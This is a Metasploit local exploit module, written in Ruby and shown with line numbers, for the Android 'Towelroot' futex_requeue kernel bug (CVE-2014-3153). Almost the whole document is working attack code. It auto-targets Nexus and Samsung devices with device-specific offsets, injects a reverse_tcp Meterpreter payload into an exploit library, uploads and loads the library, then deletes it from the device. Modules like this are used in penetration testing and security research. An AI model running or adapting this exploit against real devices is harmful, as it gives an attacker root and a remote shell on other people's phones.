Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Common
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        {
18
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
19
          'Description' => %q{
20
            This module exploits a bug in futex_requeue in the Linux kernel, using
21
            similar techniques employed by the towelroot exploit. Any Android device
22
            with a kernel built before June 2014 is likely to be vulnerable.
23
          },
24
          'License' => MSF_LICENSE,
25
          'Author' => [
26
            'Pinkie Pie', # discovery
27
            'geohot',     # towelroot
28
            'timwr'       # metasploit module
29
          ],
30
          'References' => [
31
            [ 'CVE', '2014-3153' ],
32
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
33
            [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
34
          ],
35
          'DisclosureDate' => '2014-05-03',
36
          'SessionTypes' => [ 'meterpreter' ],
37
          'Platform' => [ "android", "linux" ],
38
          'Payload' => { 'Space' => 2048, },
39
          'DefaultOptions' => {
40
            'WfsDelay' => 300,
41
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
42
          },
43
          'Notes' => {
44
            'Stability' => [CRASH_SAFE],
45
            'SideEffects' => [],
46
            'Reliability' => [],
47
            'AKA' => ['towelroot'] },
48
          'DefaultTarget' => 0,
49
          'Targets' => [
50
            # Automatic targetting via getprop ro.build.model
51
            ['Automatic Targeting', { 'auto' => true }],
52

53
            # This is the default setting, Nexus 4, 5, 7, etc
54
            [
55
              'Default',
56
              {
57
                'new_samsung' => false,
58
                'iovstack' => 2,
59
                'offset' => 0,
60
                'force_remove' => false,
61
              }
62
            ],
63

64
            # Samsung devices, S3, S4, S5, etc
65
            [
66
              'New Samsung',
67
              {
68
                'new_samsung' => true,
69
                'iovstack' => 2,
70
                'offset' => 7380,
71
                'force_remove' => true,
72
              }
73
            ],
74

75
            # Older Samsung devices, e.g the Note 2
76
            [
77
              'Old Samsung',
78
              {
79
                'new_samsung' => false,
80
                'iovstack' => 1,
81
                'offset' => 0,
82
                'force_remove' => true,
83
              }
84
            ],
85

86
            # Samsung Galaxy Grand, etc
87
            [
88
              'Samsung Grand',
89
              {
90
                'new_samsung' => false,
91
                'iovstack' => 5,
92
                'offset' => 0,
93
                'force_remove' => true,
94
              }
95
            ],
96
          ],
97
          'Compat' => {
98
            'Meterpreter' => {
99
              'Commands' => %w[
100
                core_loadlib
101
                stdapi_fs_delete_file
102
                stdapi_fs_getwd
103
              ]
104
            }
105
          },
106
        }
107
      )
108
    )
109
  end
110

111
  def check
112
    os = cmd_exec("getprop ro.build.version.release")
113
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
114
      vprint_error "Android version #{os} does not appear to be vulnerable"
115
      return CheckCode::Safe
116
    end
117
    vprint_good "Android version #{os} appears to be vulnerable"
118

119
    CheckCode::Appears
120
  end
121

122
  def exploit
123
    if target['auto']
124
      product = cmd_exec("getprop ro.build.product")
125
      fingerprint = cmd_exec("getprop ro.build.fingerprint")
126
      print_status("Found device: #{product}")
127
      print_status("Fingerprint: #{fingerprint}")
128

129
      if [
130
        "mako",
131
        "m7",
132
        "hammerhead",
133
        "grouper",
134
        "Y530-U00",
135
        "G6-U10",
136
        "g2",
137
        "w7n",
138
        "D2303",
139
        "cancro",
140
      ].include? product
141
        my_target = targets[1] # Default
142
      elsif [
143
        "klte", # Samsung Galaxy S5
144
        "jflte", # Samsung Galaxy S4
145
        "d2vzw" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
146
      ].include? product
147
        my_target = targets[2] # New Samsung
148
      elsif [
149
        "t03g",
150
        "m0",
151
      ].include? product
152
        my_target = targets[3] # Old Samsung
153
      elsif [
154
        "baffinlite",
155
        "Vodafone_785",
156
      ].include? product
157
        my_target = targets[4] # Samsung Grand
158
      else
159
        print_status("Could not automatically target #{product}")
160
        my_target = targets[1] # Default
161
      end
162
    else
163
      my_target = target
164
    end
165

166
    print_status("Using target: #{my_target.name}")
167

168
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-3153.so")
169
    exploit_data = File.read(local_file, mode: 'rb')
170

171
    # Substitute the exploit shellcode with our own
172
    space = payload_space
173
    payload_encoded = payload.encoded
174
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
175

176
    # Apply the target config
177
    offsets = my_target.opts
178
    config_buf = [
179
      offsets['new_samsung'] ? -1 : 0,
180
      offsets['iovstack'].to_i,
181
      offsets['offset'].to_i,
182
      offsets['force_remove'] ? -1 : 0,
183
    ].pack('I4')
184
    exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf)
185

186
    workingdir = session.fs.dir.getwd
187
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
188
    write_file(remote_file, exploit_data)
189

190
    print_status("Loading exploit library #{remote_file}")
191
    session.core.load_library(
192
      'LibraryFilePath' => local_file,
193
      'TargetFilePath' => remote_file,
194
      'UploadLibrary' => false,
195
      'Extension' => false,
196
      'SaveToDisk' => false
197
    )
198
    print_status("Loaded library #{remote_file}, deleting")
199
    session.fs.file.rm(remote_file)
200
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
201
  end
202
end
203

204